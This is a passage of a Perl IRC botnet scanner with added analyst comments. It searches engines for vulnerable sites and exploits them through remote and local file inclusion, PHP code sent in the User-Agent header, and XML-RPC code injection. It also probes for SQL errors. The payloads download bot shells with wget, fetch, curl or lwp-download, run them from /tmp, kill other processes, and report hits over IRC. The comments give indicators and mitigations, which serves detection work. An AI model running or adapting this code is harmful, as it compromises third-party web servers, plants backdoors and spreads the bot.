  410. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
  411. }
  412. }
  413. exit;
  414. }
  415. }
  416.  
  417. ##################################################################### LOKO SCAN
  418.  
  419. if ($msg=~ /^$lokocmd\s+(.*)/) {
  420. if (my $pid = fork) {
  421. waitpid($pid, 0);
  422. }
  423. else {
  424. if (fork) { exit; } else {
  425. my ($bug,$dork) = ("filemanager/browser.html",$1);
  426. &msg("$path","$lokologo 9Dork :4 $dork");
  427. &msg("$path","$lokologo 8Search Engine Loading ...");
  428. &scan_start($path,$bug,$dork,$engine,6);
  429. }
  430. exit;
  431. }
  432. }
  433. ##################################################################### OPENCART SCAN
  434.  
  435. if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
  436. if (my $pid = fork) {
  437. waitpid($pid, 0);
  438. }
  439. else {
  440. if (fork) { exit; } else {
  441. my ($bug,$dork) = ($1,$2);
  442. &msg("$path","$oplogo 9Dork :4 $dork");
  443. &msg("$path","$oplogo 13Bugz :4 $bug");
  444. &msg("$path","$oplogo 8Search Engine Loading ...");
  445. &scan_start($path,$bug,$dork,$engine,7);
  446. }
  447. exit;
  448. }
  449. }
  450. ##################################################################### ZEN SCAN
  451.  
  452. if ($msg=~ /^$zencmd\s+(.*)/) {
  453. if (my $pid = fork) {
  454. waitpid($pid, 0);
  455. }
  456. else {
  457. if (fork) { exit; } else {
  458. my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  459. &msg("$path","$zenlogo 9Dork :4 $dork");
  460. &msg("$path","$zenlogo 13Search Engine Loading ...");
  461. &scan_start($path,$bug,$dork,$engine,8);
  462. }
  463. exit;
  464. }
  465. }
  466. ##################################################################### ZEN SCAN
  467.  
  468. if ($msg=~ /^$zencmd\s+(.*)/) {
  469. if (my $pid = fork) {
  470. waitpid($pid, 0);
  471. }
  472. else {
  473. if (fork) { exit; } else {
  474. my ($bug,$dork) = ("admin/record_company.php",$1);
  475. &scan_start($path,$bug,$dork,$engine,8);
  476. }
  477. exit;
  478. }
  479. }
  480. ##################################################################### TIMTHUMB.PHP SCAN (ADDED)
  481.  
  482. if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
  483. if (my $pid = fork) {
  484. waitpid($pid, 0);
  485. }
  486. else {
  487. if (fork) { exit; } else {
  488. my ($bug,$dork) = ($1,$2);
  489. &msg("$path","$thumblogo 9Dork :4 $dork");
  490. &msg("$path","$thumblogo 13Bugz :4 $bug");
  491. &msg("$path","$thumblogo 8Search Engine Loading ...");
  492. &scan_start($path,$bug,$dork,$engine,9);
  493. }
  494. exit;
  495. }
  496. }
  497. #####################################################################
  498. }
  499. }
  500.  
  # Line reassembly: every complete line goes to parse(). The last fragment of
  # a read is parsed only if it is the sole line, ended in "\r", or looks like
  # a NOTICE AUTH line; otherwise it is kept in $line_temp and prepended to the
  # first line of the next read.
  501. for(my $c=0; $c<= $#lines; $c++) {
  502. $line = $lines[$c];
  503. $line = $line_temp.$line if ($line_temp);
  504. $line_temp = '';
  505. $line =~ s/\r$//;
  506. unless ($c == $#lines) {
  507. &parse("$line");
  508. } else {
  509. if ($#lines == 0) {
  510. &parse("$line");
  511. } elsif ($lines[$c] =~ /\r$/) {
  512. &parse("$line");
  513. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  514. &parse("$line");
  515. } else {
  516. $line_temp = $line;
  517. }
  518. }
  519. }
  520. }
  521. }
  522.  
  523. #########################################
  # type(CHAN, BUG, DORK, ENGINE, TYPE): dispatch on the numeric module code
  # that the main loop passes through scan_start():
  #   1 rfi, 2 lfi, 3 xml, 4 sql, 5 osco, 6 loko, 7 op, 8 zen, 9 thumb.
  # Any other code falls through without action. The sub is declared with an
  # empty prototype, but every call in the visible part of the file uses the
  # &name(...) form, which does not apply prototypes.
  524. sub type () {
  525. my ($chan,$bug,$dork,$engine,$type) = @_;
  526. if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
  527. elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}
  528. elsif ($type == 3){&xml($chan,$bug,$dork,$engine);}
  529. elsif ($type == 4){&sql($chan,$bug,$dork,$engine);}
  530. elsif ($type == 5){&osco($chan,$bug,$dork,$engine);}
  531. elsif ($type == 6){&loko($chan,$bug,$dork,$engine);}
  532. elsif ($type == 7){&op($chan,$bug,$dork,$engine);}
  533. elsif ($type == 8){&zen($chan,$bug,$dork,$engine);}
  534. elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);}
  535. }
  # scan_start(CHAN, BUG, DORK, ENGINE, TYPE): fan a scan out across search
  # engines. $engine is matched case-insensitively against each engine name in
  # turn; every branch that matches double-forks (the intermediate child exits
  # so the worker is detached) and calls type() with that engine's label.
  # The main loop always passes the full comma-separated engine list, so every
  # branch below matches and one scan command spawns a detached worker per
  # engine. Because the list contains both "GooGLe" and "GooGle2", the /google/
  # and /google2/ branches both fire.
  # Host-side, this is a burst of perl processes all carrying the fake process
  # name set at startup; network-side, it is a wave of outbound search-engine
  # queries from a host that normally makes none.
  # Only the first branch declares $pid with my; the others assign a package
  # global.
  536. sub scan_start() {
  537. my ($chan,$bug,$dork,$engine,$type) = @_;
  538. if ($engine =~ /google/i) {
  539. if (my $pid = fork) { waitpid($pid, 0); }
  540. else { if (fork) { exit; } else {
  541. &type($chan,$bug,$dork,"GooGLe",$type);
  542. } exit; }
  543. }
  544.  
  545. if ($engine =~ /google2/i) {
  546. if ($pid = fork) { waitpid($pid, 0); }
  547. else { if (fork) { exit; } else {
  548. &type($chan,$bug,$dork,"GooGle2",$type);
  549. } exit; }
  550. }
  551.  
  552. if ($engine =~ /bing/i) {
  553. if ($pid = fork) { waitpid($pid, 0); }
  554. else { if (fork) { exit; } else {
  555. &type($chan,$bug,$dork,"Bing",$type);
  556. } exit; }
  557. }
  558.  
  559. if ($engine =~ /altavista/i) {
  560. if ($pid = fork) { waitpid($pid, 0); }
  561. else { if (fork) { exit; } else {
  562. &type($chan,$bug,$dork,"ALtaViSTa",$type);
  563. } exit; }
  564. }
  565.  
  566. if ($engine =~ /ask/i) {
  567. if ($pid = fork) { waitpid($pid, 0); }
  568. else { if (fork) { exit; } else {
  569. &type($chan,$bug,$dork,"AsK",$type);
  570. } exit; }
  571. }
  572.  
  573. if ($engine =~ /uol/i) {
  574. if ($pid = fork) { waitpid($pid, 0); }
  575. else { if (fork) { exit; } else {
  576. &type($chan,$bug,$dork,"UoL",$type);
  577. } exit; }
  578. }
  579.  
  580. if ($engine =~ /yahoo/i) {
  581. if ($pid = fork) { waitpid($pid, 0); }
  582. else { if (fork) { exit; } else {
  583. &type($chan,$bug,$dork,"YahOo",$type);
  584. } exit; }
  585. }
  586.  
  587. if ($engine =~ /clusty/i) {
  588. if ($pid = fork) { waitpid($pid, 0); }
  589. else { if (fork) { exit; } else {
  590. &type($chan,$bug,$dork,"CluSty",$type);
  591. } exit; }
  592. }
  593.  
  594. if ($engine =~ /gutser/i) {
  595. if ($pid = fork) { waitpid($pid, 0); }
  596. else { if (fork) { exit; } else {
  597. &type($chan,$bug,$dork,"GutSer",$type);
  598. } exit; }
  599. }
  600.  
  601. if ($engine =~ /rediff/i) {
  602. if ($pid = fork) { waitpid($pid, 0); }
  603. else { if (fork) { exit; } else {
  604. &type($chan,$bug,$dork,"ReDiff",$type);
  605. } exit; }
  606. }
  607.  
  608. if ($engine =~ /virgilio/i) {
  609. if ($pid = fork) { waitpid($pid, 0); }
  610. else { if (fork) { exit; } else {
  611. &type($chan,$bug,$dork,"VirgiLio",$type);
  612. } exit; }
  613. }
  614.  
  615. if ($engine =~ /webde/i) {
  616. if ($pid = fork) { waitpid($pid, 0); }
  617. else { if (fork) { exit; } else {
  618. &type($chan,$bug,$dork,"WebDe",$type);
  619. } exit; }
  620. }
  621.  
  622. if ($engine =~ /exalead/i) {
  623. if ($pid = fork) { waitpid($pid, 0); }
  624. else { if (fork) { exit; } else {
  625. &type($chan,$bug,$dork,"ExaLead",$type);
  626. } exit; }
  627. }
  628.  
  629. if ($engine =~ /lycos/i) {
  630. if ($pid = fork) { waitpid($pid, 0); }
  631. else { if (fork) { exit; } else {
  632. &type($chan,$bug,$dork,"LyCos",$type);
  633. } exit; }
  634. }
  635.  
  636. if ($engine =~ /hotbot/i) {
  637. if ($pid = fork) { waitpid($pid, 0); }
  638. else { if (fork) { exit; } else {
  639. &type($chan,$bug,$dork,"HotBot",$type);
  640. } exit; }
  641. }
  642.  
  643. if ($engine =~ /aol/i) {
  644. if ($pid = fork) { waitpid($pid, 0); }
  645. else { if (fork) { exit; } else {
  646. &type($chan,$bug,$dork,"AoL",$type);
  647. } exit; }
  648. }
  649.  
  650. if ($engine =~ /sapo/i) {
  651. if ($pid = fork) { waitpid($pid, 0); }
  652. else { if (fork) { exit; } else {
  653. &type($chan,$bug,$dork,"SaPo",$type);
  654. } exit; }
  655. }
  656.  
  657. if ($engine =~ /duck/i) {
  658. if ($pid = fork) { waitpid($pid, 0); }
  659. else { if (fork) { exit; } else {
  660. &type($chan,$bug,$dork,"DuCk",$type);
  661. } exit; }
  662. }
  663.  
  664. if ($engine =~ /lygo/i) {
  665. if ($pid = fork) { waitpid($pid, 0); }
  666. else { if (fork) { exit; } else {
  667. &type($chan,$bug,$dork,"LyGo",$type);
  668. } exit; }
  669. }
  670.  
  671. if ($engine =~ /yause/i) {
  672. if ($pid = fork) { waitpid($pid, 0); }
  673. else { if (fork) { exit; } else {
  674. &type($chan,$bug,$dork,"YauSe",$type);
  675. } exit; }
  676. }
  677.  
  678. if ($engine =~ /baidu/i) {
  679. if ($pid = fork) { waitpid($pid, 0); }
  680. else { if (fork) { exit; } else {
  681. &type($chan,$bug,$dork,"BaiDu",$type);
  682. } exit; }
  683. }
  684.  
  685. if ($engine =~ /kipot/i) {
  686. if ($pid = fork) { waitpid($pid, 0); }
  687. else { if (fork) { exit; } else {
  688. &type($chan,$bug,$dork,"KiPoT",$type);
  689. } exit; }
  690. }
  691.  
  692. if ($engine =~ /gibla/i) {
  693. if ($pid = fork) { waitpid($pid, 0); }
  694. else { if (fork) { exit; } else {
  695. &type($chan,$bug,$dork,"GiBLa",$type);
  696. } exit; }
  697. }
  698.  
  699. if ($engine =~ /black/i) {
  700. if ($pid = fork) { waitpid($pid, 0); }
  701. else { if (fork) { exit; } else {
  702. &type($chan,$bug,$dork,"BLacK",$type);
  703. } exit; }
  704. }
  705.  
  706. if ($engine =~ /onet/i) {
  707. if ($pid = fork) { waitpid($pid, 0); }
  708. else { if (fork) { exit; } else {
  709. &type($chan,$bug,$dork,"oNeT",$type);
  710. } exit; }
  711. }
  712.  
  713. if ($engine =~ /sizuka/i) {
  714. if ($pid = fork) { waitpid($pid, 0); }
  715. else { if (fork) { exit; } else {
  716. &type($chan,$bug,$dork,"SiZuka",$type);
  717. } exit; }
  718. }
  719.  
  720. if ($engine =~ /walla/i) {
  721. if ($pid = fork) { waitpid($pid, 0); }
  722. else { if (fork) { exit; } else {
  723. &type($chan,$bug,$dork,"WaLLa",$type);
  724. } exit; }
  725. }
  726.  
  727. if ($engine =~ /demos/i) {
  728. if ($pid = fork) { waitpid($pid, 0); }
  729. else { if (fork) { exit; } else {
  730. &type($chan,$bug,$dork,"DeMos",$type);
  731. } exit; }
  732. }
  733.  
  734. if ($engine =~ /rose/i) {
  735. if ($pid = fork) { waitpid($pid, 0); }
  736. else { if (fork) { exit; } else {
  737. &type($chan,$bug,$dork,"RoSe",$type);
  738. } exit; }
  739. }
  740.  
  741. if ($engine =~ /seznam/i) {
  742. if ($pid = fork) { waitpid($pid, 0); }
  743. else { if (fork) { exit; } else {
  744. &type($chan,$bug,$dork,"SeZnaM",$type);
  745. } exit; }
  746. }
  747.  
  748. if ($engine =~ /tiscali/i) {
  749. if ($pid = fork) { waitpid($pid, 0); }
  750. else { if (fork) { exit; } else {
  751. &type($chan,$bug,$dork,"TisCali",$type);
  752. } exit; }
  753. }
  754.  
  755. if ($engine =~ /naver/i) {
  756. if ($pid = fork) { waitpid($pid, 0); }
  757. else { if (fork) { exit; } else {
  758. &type($chan,$bug,$dork,"NaVeR",$type);
  759. } exit; }
  760. }
  761. }
  762.  
  763. #########################################
  764.  
  # rfi(CHAN, BUG, DORK, ENGINE): remote-file-inclusion scan over the site list
  # returned by search_engine() (defined outside this part of the file).
  # For each site it requests the vulnerable-path URL with "test??" appended,
  # and also the same URL with each staging URL appended; the staging requests
  # are sent whether or not the probe response looks promising. A site is
  # treated as a candidate when the probe response contains PHP's
  # "failed to open stream" error text, and rfi_xpl() then runs in a detached
  # child.
  # What a site owner sees: requests whose parameter value is "test??" or a
  # full http:// URL followed by "??", sent with one of the obsolete
  # User-Agent strings. PHP's allow_url_include=Off prevents the inclusion
  # itself, and display_errors=Off removes the error text this routine keys on.
  765. sub rfi() {
  766. my $chan = $_[0];
  767. my $bug = $_[1];
  768. my $dork = $_[2];
  769. my $engine = $_[3];
  770. my $count = 0;
  771. my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  772. my $num = scalar(@list);
  773. if ($num > 0) {
  774. foreach my $site (@list) {
  775. $count++;
  # The "Scan finish" notice goes out when the counter reaches $num-1, that is,
  # one item before the end of the list.
  776. if ($count == $num-1) { &msg("$chan","$rfilogo(4@9$engine15)10 Scan finish"); }
  777. my $coba = "http://".$site.$bug."test??";
  778. my $test = "http://".$site.$bug.$injector."??";
  779. my $dor = "http://".$site.$bug.$botshell."??";
  780. my $dor2 = "http://".$site.$bug.$botshell2."??";
  # get_content() is defined outside this part of the file; one-second pauses
  # separate the three requests.
  781. my $cek = &get_content($coba);sleep(1);
  782. &get_content($dor);sleep(1);
  783. &get_content($dor2);sleep(1);
  784. if ($cek =~ /failed to open stream/i) {
  785. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  786. &rfi_xpl($test,$chan,$site);
  787. exit;}
  788. }
  789. }
  790. }
  791. }
  792. }
  793.  
  # rfi_xpl: follow-up request for a host that answered the rfi() probe.
  # Args: URL built by the caller, IRC channel, host.
  # Appends $botshell, $botshell2 and $injector (file-level variables) plus
  # "??" to $url, requests all three, and looks for the marker string
  # "JANCOK- exploit" in the $injector response. That marker is a usable
  # content signature for the page the included file renders.
  # On a match it scrapes the "SAFE MODE is", "OS :" and "Freespace :" fields
  # from the HTML and reports them to the channel and to $admin via msg().
  794. sub rfi_xpl() {
  795. my $url = $_[0];
  796. my $chan = $_[1];
  797. my $site = $_[2];
  798. my $dor = $url.$botshell."??";
  799. my $dor2 = $url.$botshell2."??";
  800. my $test = $url.$injector."??";
  801. my $vuln = $url."14(ByroeNet)";
  802. my $check = &get_content($test);
  803. &get_content($dor);sleep(1);
  804. &get_content($dor2);sleep(1);
  805. if ( $check =~ /JANCOK- exploit/i ) {
  806. my $safe ="";
  807. my $os ="";
  808. my $free ="";
  # $soft is assigned without "my" (package variable) and is not used in the
  # messages below.
  809. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  810. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
  811. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  812. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  813. &msg("$chan","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
  814. &msg("$admin","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
  815. }
  # No marker in the response: only the channel is notified.
  816. else {&msg("$chan","$rfilogo(4@9VuLn15)10 ".$vuln." (4@7safemode-on15)");}
  817. }
  818.  
  # lfi: scan routine for local-file-inclusion candidates (analysis notes).
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # For each host from search_engine() it requests a directory-traversal path
  # to /proc/self/environ and, if the response looks like an environment
  # dump, sends PHP code in the User-Agent header (see lfi_env_query).
  # Indicators visible in this sub:
  #   - request paths containing "/proc/self/environ" and the suffix "%0000"
  #   - User-Agent values beginning "<?eval(base64_decode('"
  #   - files /tmp/ipays, /tmp/dev, /tmp/maza on the host
  #   - aspaltx.php, byroe.php, allnet.php in the web server's working directory
  #   - response markers "c0li#" / "#c0li" and "JANCOK- exploit"
  819. sub lfi() {
  820. my $chan = $_[0];
  821. my $bug = $_[1];
  822. my $dork = $_[2];
  823. my $engine = $_[3];
  824. my $count = 0;
  825. my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  826. my $num = scalar(@list);
  827. if ($num > 0) {
  828. foreach my $site (@list) {
  829. $count++;
  830. if ($count == $num-1) { &msg("$chan","$lfilogo(4@8$engine15)10 Scan finish"); }
  831. my $dir = "../../../../../../../../../../../../../";
  832. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  833. my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
  834. my $shell = "http://".$site."12".$bug.$dir."/tmp/ipays%0000";
  835. my $html = &get_content($test);
  # Both strings must be present for the response to count as an environ dump.
  836. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
  # Double fork: parent reaps the first child; the grandchild does the work.
  837. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  # PHP sent in the User-Agent: prints c0li#<php_uname()>#c0li<current user>,
  # copies $injector to /tmp/ipays and, when that copy succeeds, prints
  # SUCCESS and copies $botshell / $botshell2 to /tmp/dev and /tmp/maza.
  838. my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
  839. my $res = lfi_env_query($test,encode_base64($code));
  840. &lfi_spread_query($test);
  841. &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
  842. &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
  843. $res =~ s/\n//g;
  844. if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
  845. my $sys = $1;
  # Overwrites the file-level $nob0dy with the captured user name.
  846. $nob0dy = $2;
  847. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
  848. }
  # Markers present but no SUCCESS: a second payload built on system() and
  # passthru() is sent, which kills perl/php processes and downloads the
  # three files with wget/fetch under the names aspaltx.php, byroe.php and
  # allnet.php.
  849. elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
  850. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  851. my $sys = $1;
  852. $nob0dy = $2;
  853. my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';
  854. my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  855. my $check = &get_content("http://".$site.$bug.$dir."/tmp/ipays%0000"); sleep(2);
  856. &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
  857. &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
  858. if ($check =~ /JANCOK- exploit/) {
  859. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
  860. &msg("$admin","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
  861. }
  862. else {
  863. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
  864. }
  865. } exit; }
  866. }
  # Environ was readable but neither marker pattern came back: reported only.
  867. else { &msg("$chan","$lfilogo(4@8$engine15)15(4@9EnviRon15)10 ".$vuln); }
  868. } exit; } sleep(2);
  869. }
  870. }
  871. }
  872. }
  873.  
  # lfi_env_query: GET $url with a User-Agent header of the form
  # <?eval(base64_decode('<code>'));?>, where <code> is the caller's
  # base64 string, and return the response body.
  # Detection: the header value is sent as-is, so "<?eval(base64_decode("
  # in the User-Agent field of access logs or WAF events matches it.
  # Timeout is 7 seconds.
  874. sub lfi_env_query() {
  875. my $url = $_[0];
  876. my $code = $_[1];
  877. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
  878. $ua->timeout(7);
  879. my $req = HTTP::Request->new(GET => $url);
  880. my $res = $ua->request($req);
  881. return $res->content;
  882. }
  883.  
  # lfi_spread_query: sends one GET to $url whose User-Agent carries a
  # base64-wrapped PHP system() call, using the same header form as
  # lfi_env_query. The response is stored in $res but not used or returned.
  # The command string works in /tmp and then /var/tmp, tries fetch, wget,
  # curl -O and lwp-download in turn for $botshell and $botshell2, runs the
  # downloads with the php binary as byroe.jpg / allnet.jpg and deletes them.
  # Host-side hunting: php processes started from /tmp or /var/tmp on *.jpg
  # files, and short-lived byroe.jpg / allnet.jpg files in those directories.
  884. sub lfi_spread_query() {
  885. my $url = $_[0];
  886. my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;rm -rf *.jp*;');";
  887. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
  888. $ua->timeout(7);
  889. my $req = HTTP::Request->new(GET => $url);
  890. my $res = $ua->request($req);
  891. }
  892.  
  # xml: scan routine keyed on the string "faultCode" in the response
  # (presumably an XML-RPC endpoint, given the <methodCall> bodies built in
  # xml_cek_query / xml_spread_query).
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Flow per host: GET host+$bug; on "faultCode" fork a detached grandchild
  # that calls xml_cek_query(); if the response echoes the j13mb0t markers,
  # call xml_spread_query() and then request aspaltx.php, byroe.php and
  # allnet.php directly under the host string.
  # Indicators: those three file names and the marker "JANCOK- exploit" in
  # the aspaltx.php response.
  893. sub xml() {
  894. my $chan = $_[0];
  895. my $bug = $_[1];
  896. my $dork = $_[2];
  897. my $engine = $_[3];
  898. my $count = 0;
  899. my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
  900. my $num = scalar(@list);
  901. if ($num > 0) {
  902. foreach my $site (@list) {
  903. $count++;
  904. if ($count == $num-1) { &msg("$chan","$xmllogo(4@8$engine15)10 Scan finish"); }
  905. my $test = "http://".$site.$bug;
  906. my $vuln = "http://".$site."13".$bug;
  907. my $html = &get_content($test);
  908. if ($html =~ /faultCode/ ) {
  # Double fork: parent reaps the first child; the grandchild does the work.
  909. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  910. my $resp = &xml_cek_query($test);
  # Text between the two j13mb0t markers is the output of the test command.
  911. if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
  912. &xml_spread_query($test);sleep(2);
  913. my $sys = $1;
  914. my $check = &get_content("http://".$site."aspaltx.php");
  915. &get_content("http://".$site."byroe.php");
  916. &get_content("http://".$site."allnet.php");
  917. if ($check =~ /JANCOK- exploit/) {
  918. &msg("$chan","$xmllogo(4@8$engine15)15(13@9SheLL15)13 http://".$site."7aspaltx.php 3".$sys);&get_content("http://".$site."byroe.php"); sleep(2);}
  919. else {
  920. &msg("$chan","$xmllogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 3".$sys); sleep(2);}
  921. }
  922. sleep(2); } exit; } }
  923. }
  924. }
  925. }
  926.  
  # xml_cek_query: POSTs a text/xml <methodCall> body to $url and returns
  # the response body. The <name> value closes a quoted string and call
  # (',''));) and then carries PHP that echoes "j13mb0t", runs
  # system('uname -a'), echoes "j13mb0t" again and exits.
  # Request signature: User-Agent "perl post", methodName "test.method",
  # and the literal "echo'j13mb0t';" in the POST body.
  # $exploit is assigned without "my", so it is a package variable.
  927. sub xml_cek_query() {
  928. my $url = $_[0];
  929. my $code = "system('uname -a');";
  930. my $ua = LWP::UserAgent->new(agent => 'perl post');
  931. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  932. $exploit .= "<methodName>test.method</methodName>";
  933. $exploit .= "<params><param><value><name>',''));";
  934. $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
  935. $ua->timeout(7);
  936. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
  937. return $res->content;
  938. }
  939.  
  # xml_spread_query: same request shape as xml_cek_query (User-Agent
  # "perl post", text/xml <methodCall>, methodName "test.method"), but the
  # embedded PHP system() call downloads $injector, $botshell and $botshell2
  # with wget/fetch as aspaltx.php, byroe.php and allnet.php, kills perl and
  # php processes, then repeats the fetch/wget/curl/lwp-download + "php
  # <file>.jpg" sequence in /tmp and /var/tmp.
  # Body markers are "echo'j13m';" and "echo'b0T';". The response is not read.
  940. sub xml_spread_query() {
  941. my $xmltargt = $_[0];
  942. my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;');";
  943. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  944. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  945. $exploit .= "<methodName>test.method</methodName>";
  946. $exploit .= "<params><param><value><name>',''));";
  947. $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
  948. $userAgent->timeout(7);
  949. $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  950. }
  951.  
  # sql: scan routine that fingerprints database error pages.
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # For each host it requests host+$bug with a single quote appended and
  # classifies the response by error text:
  #   MySQL-style messages        -> sqlbrute()
  #   SQL Server / ODBC messages  -> reported to the channel as MsSQL
  #   JET / Access messages       -> reported to the channel as MsAccess
  # Mitigation note: every branch keys on verbose database errors returned
  # to the client; generic error pages remove the signal this sub relies on
  # (the underlying injection still needs parameterised queries).
  952. sub sql() {
  953. my $chan = $_[0];
  954. my $bug = $_[1];
  955. my $dork = $_[2];
  956. my $engine = $_[3];
  957. my $count = 0;
  958. my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  959. my $num = scalar(@list);
  960. if ($num > 0) {
  961. foreach my $site (@list) {
  962. $count++;
  963. if ($count == $num-1) { &msg("$chan","$sqllogo(4@8$engine15)10 Scan finish"); }
  964. my $test = "http://".$site.$bug."'";
  965. my $vuln = "http://".$site."4".$bug;
  966. my $sqlsite = "http://".$site.$bug;
  967. my $html = &get_content($test);
  # Double fork: classification and any follow-up run in a detached grandchild.
  968. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  969. if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  970. &sqlbrute($sqlsite,$chan,$engine);}
